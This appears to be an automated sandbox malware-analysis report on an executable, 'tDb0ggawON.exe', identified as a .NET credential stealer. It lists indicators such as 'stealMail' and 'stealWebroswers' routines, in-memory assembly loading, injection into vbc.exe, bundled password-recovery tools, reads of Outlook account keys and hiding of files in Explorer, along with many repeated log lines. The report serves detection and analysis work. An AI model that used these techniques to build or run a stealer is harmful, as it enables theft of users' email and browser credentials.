                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.335816568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.336658254.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 11.2.tDb0ggawON.exe.400000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 11.0.tDb0ggawON.exe.400000.4.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,14_2_00415AFD
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,14_2_00411196
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, Form1.csBase64 encoded string: 'kU9AKBYzTfDozk78v7S8AJ4qRIoajat5imvHiMgiRkXdoX1WWUMkcLeIbq0f5Ki+', '+NuhvnHL/23apr//8A7D9HKLlcgATfODiXKjHLGsasbFDJBFHqbDrty+sGNtrFgc0eVe1DxY3U1N9v9ixGVjuQ==', 'oS55EiDwvndYEtZ5+lXTfbIb8G1taLPDlWmbhqlMK5CSJNdt9Qbgk/vwkhCaHpDIwtEy26QBS+jq3mOtR2AT75ZDkMahwZY7KngJ5TRfdok=', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.csBase64 encoded string: 'kU9AKBYzTfDozk78v7S8AJ4qRIoajat5imvHiMgiRkXdoX1WWUMkcLeIbq0f5Ki+', '+NuhvnHL/23apr//8A7D9HKLlcgATfODiXKjHLGsasbFDJBFHqbDrty+sGNtrFgc0eVe1DxY3U1N9v9ixGVjuQ==', 'oS55EiDwvndYEtZ5+lXTfbIb8G1taLPDlWmbhqlMK5CSJNdt9Qbgk/vwkhCaHpDIwtEy26QBS+jq3mOtR2AT75ZDkMahwZY7KngJ5TRfdok=', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                  Source: 11.0.tDb0ggawON.exe.400000.4.unpack, Form1.csBase64 encoded string: 'kU9AKBYzTfDozk78v7S8AJ4qRIoajat5imvHiMgiRkXdoX1WWUMkcLeIbq0f5Ki+', '+NuhvnHL/23apr//8A7D9HKLlcgATfODiXKjHLGsasbFDJBFHqbDrty+sGNtrFgc0eVe1DxY3U1N9v9ixGVjuQ==', 'oS55EiDwvndYEtZ5+lXTfbIb8G1taLPDlWmbhqlMK5CSJNdt9Qbgk/vwkhCaHpDIwtEy26QBS+jq3mOtR2AT75ZDkMahwZY7KngJ5TRfdok=', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                  Source: 11.2.tDb0ggawON.exe.400000.0.unpack, Form1.csBase64 encoded string: 'kU9AKBYzTfDozk78v7S8AJ4qRIoajat5imvHiMgiRkXdoX1WWUMkcLeIbq0f5Ki+', '+NuhvnHL/23apr//8A7D9HKLlcgATfODiXKjHLGsasbFDJBFHqbDrty+sGNtrFgc0eVe1DxY3U1N9v9ixGVjuQ==', 'oS55EiDwvndYEtZ5+lXTfbIb8G1taLPDlWmbhqlMK5CSJNdt9Qbgk/vwkhCaHpDIwtEy26QBS+jq3mOtR2AT75ZDkMahwZY7KngJ5TRfdok=', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpack, Form1.csBase64 encoded string: 'kU9AKBYzTfDozk78v7S8AJ4qRIoajat5imvHiMgiRkXdoX1WWUMkcLeIbq0f5Ki+', '+NuhvnHL/23apr//8A7D9HKLlcgATfODiXKjHLGsasbFDJBFHqbDrty+sGNtrFgc0eVe1DxY3U1N9v9ixGVjuQ==', 'oS55EiDwvndYEtZ5+lXTfbIb8G1taLPDlWmbhqlMK5CSJNdt9Qbgk/vwkhCaHpDIwtEy26QBS+jq3mOtR2AT75ZDkMahwZY7KngJ5TRfdok=', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpack, Form1.csBase64 encoded string: 'kU9AKBYzTfDozk78v7S8AJ4qRIoajat5imvHiMgiRkXdoX1WWUMkcLeIbq0f5Ki+', '+NuhvnHL/23apr//8A7D9HKLlcgATfODiXKjHLGsasbFDJBFHqbDrty+sGNtrFgc0eVe1DxY3U1N9v9ixGVjuQ==', 'oS55EiDwvndYEtZ5+lXTfbIb8G1taLPDlWmbhqlMK5CSJNdt9Qbgk/vwkhCaHpDIwtEy26QBS+jq3mOtR2AT75ZDkMahwZY7KngJ5TRfdok=', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00411EF8 FindResourceW,SizeofResource,LoadResource,LockResource,14_2_00411EF8
                  Source: tDb0ggawON.exe, 00000000.00000003.287628346.0000000008860000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.309924532.0000000008847000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.287200122.0000000008860000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.300716031.0000000008847000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.287813801.0000000008860000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: in certain jurisdictions.slnt
                  Source: tDb0ggawON.exe, 00000000.00000003.285160387.0000000008860000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: is a trademark of The Monotype Corporation which may be registered in certain jurisdictions.slnt
                  Source: tDb0ggawON.exe, 00000000.00000003.285925430.0000000008860000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: egistered in certain jurisdictions.slnt
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: tDb0ggawON.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: tDb0ggawON.exeStatic file information: File size 1244160 > 1048576
                  Source: tDb0ggawON.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: tDb0ggawON.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x12f000
                  Source: tDb0ggawON.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.520798219.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000F.00000000.337528444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000F.00000000.337259386.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.335816568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.336658254.0000000000400000.00000040.00000400.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeUnpacked PE file: 0.2.tDb0ggawON.exe.fb0000.0.unpack
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeUnpacked PE file: 0.2.tDb0ggawON.exe.fb0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
                  .NET source code contains potential unpacker
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.tDb0ggawON.exe.400000.4.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.tDb0ggawON.exe.400000.4.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.tDb0ggawON.exe.400000.4.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.tDb0ggawON.exe.400000.4.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.2.tDb0ggawON.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.2.tDb0ggawON.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.2.tDb0ggawON.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.2.tDb0ggawON.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_00FB5AE0 push ebx; ret 0_2_00FB5AEF
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_00FB49CD push edx; ret 0_2_00FB49D5
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_00FB671A push edx; retf 0_2_00FB671F
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_05A4318F push es; iretd 0_2_05A43190
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_09F19CF5 push FFFFFF8Bh; iretd 0_2_09F19CF7
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 11_2_00BA5AE0 push ebx; ret 11_2_00BA5AEF
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 11_2_00BA49CD push edx; ret 11_2_00BA49D5
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 11_2_00BA671A push edx; retf 11_2_00BA671F
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00442871 push ecx; ret 14_2_00442881
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00442A90 push eax; ret 14_2_00442AA4
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00442A90 push eax; ret 14_2_00442ACC
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00446E54 push eax; ret 14_2_00446E61
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_00411879 push ecx; ret 15_2_00411889
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_004118A0 push eax; ret 15_2_004118B4
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_004118A0 push eax; ret 15_2_004118DC
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_004422C7 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,14_2_004422C7
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.84726885826

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Changes the view of files in windows explorer (hidden files and folders)
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00441975 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,14_2_00441975
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
